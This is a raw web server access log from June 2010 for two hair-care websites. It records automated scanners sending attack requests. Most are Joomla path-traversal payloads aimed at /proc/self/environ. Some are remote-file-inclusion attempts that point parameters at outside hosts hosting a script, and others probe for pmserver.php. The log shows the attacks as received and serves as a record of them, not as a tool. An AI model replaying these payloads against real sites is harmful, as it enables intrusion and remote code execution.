206.214.220.151 - - [21/Jun/2010:10:36:34 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:36:35 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:36:39 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:36:45 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:36:51 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:36:54 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:36:54 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:36:55 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:37:04 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:37:08 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:37:18 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:37:45 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.175.239.226 - - [21/Jun/2010:10:38:01 -0700] "GET /logs/access.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:10:39:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13424 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
114.108.128.56 - - [21/Jun/2010:10:39:33 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:10:40:05 -0700] "GET /logs/access_100531.log/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:40:05 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:40:06 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.128.56 - - [21/Jun/2010:10:40:07 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.195.37.176 - - [21/Jun/2010:10:41:09 -0700] "GET /logs/?N=D HTTP/1.0" 200 6070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:41:19 -0700] "GET /logs/access.log/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:41:19 -0700] "GET /logs/access.log/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:10:41:56 -0700] "GET /logs/access.log/pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:10:41:57 -0700] "GET /pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:10:41:57 -0700] "GET /logs/pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:42:39 -0700] "GET /logs/access_100426.log/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:43:04 -0700] "GET /logs/access_100503.log/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:43:35 -0700] "GET /logs/access_100531.log/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:43:36 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:43:36 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:43:52 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:44:11 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:44:48 -0700] "GET /logs/access.log/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:10:44:48 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:10:44:48 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:10:46:19 -0700] "GET /logs/access.log/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:10:47:41 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:10:47:56 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:50:09 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:50:09 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:50:09 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:50:25 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:50:25 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:50:26 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:51:05 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:51:06 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:51:06 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.91.250.11 - - [21/Jun/2010:10:51:09 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:51:09 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:51:09 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:51:14 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:51:14 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:51:14 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:51:33 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:51:33 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:51:34 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:51:35 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:51:36 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:51:36 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:10:51:45 -0700] "GET /logs/access.log/pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:10:51:45 -0700] "GET /pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:10:51:46 -0700] "GET /logs/pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:51:46 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:51:46 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:51:46 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:52:00 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:52:00 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:52:00 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:52:16 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:52:16 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:52:17 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:52:30 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:52:30 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:52:30 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:52:48 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:52:48 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:52:48 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:52:50 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:52:50 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:52:50 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.128.56 - - [21/Jun/2010:10:53:46 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
114.108.128.56 - - [21/Jun/2010:10:53:46 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
114.108.128.56 - - [21/Jun/2010:10:53:47 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:54:14 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:54:14 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:54:15 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:08 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:08 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:08 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:31 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:32 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:32 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
221.143.46.98 - - [21/Jun/2010:10:55:43 -0700] "GET /logs/access.log HTTP/1.1" 200 495607 "http://av.rds.yahoo.com/_ylt=A0oGkt96px9Mw5UAv2lTDqMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=11vurvdnr/EXP=1277229306/**http%3A//growlonghairfast.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:49 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:49 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:55:49 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:56:25 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:56:25 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:56:25 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.32.3.34 - - [21/Jun/2010:10:56:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
178.32.3.34 - - [21/Jun/2010:10:57:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
114.108.128.56 - - [21/Jun/2010:10:58:00 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
114.108.128.56 - - [21/Jun/2010:10:58:00 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
114.108.128.56 - - [21/Jun/2010:10:58:01 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:58:42 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:58:42 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
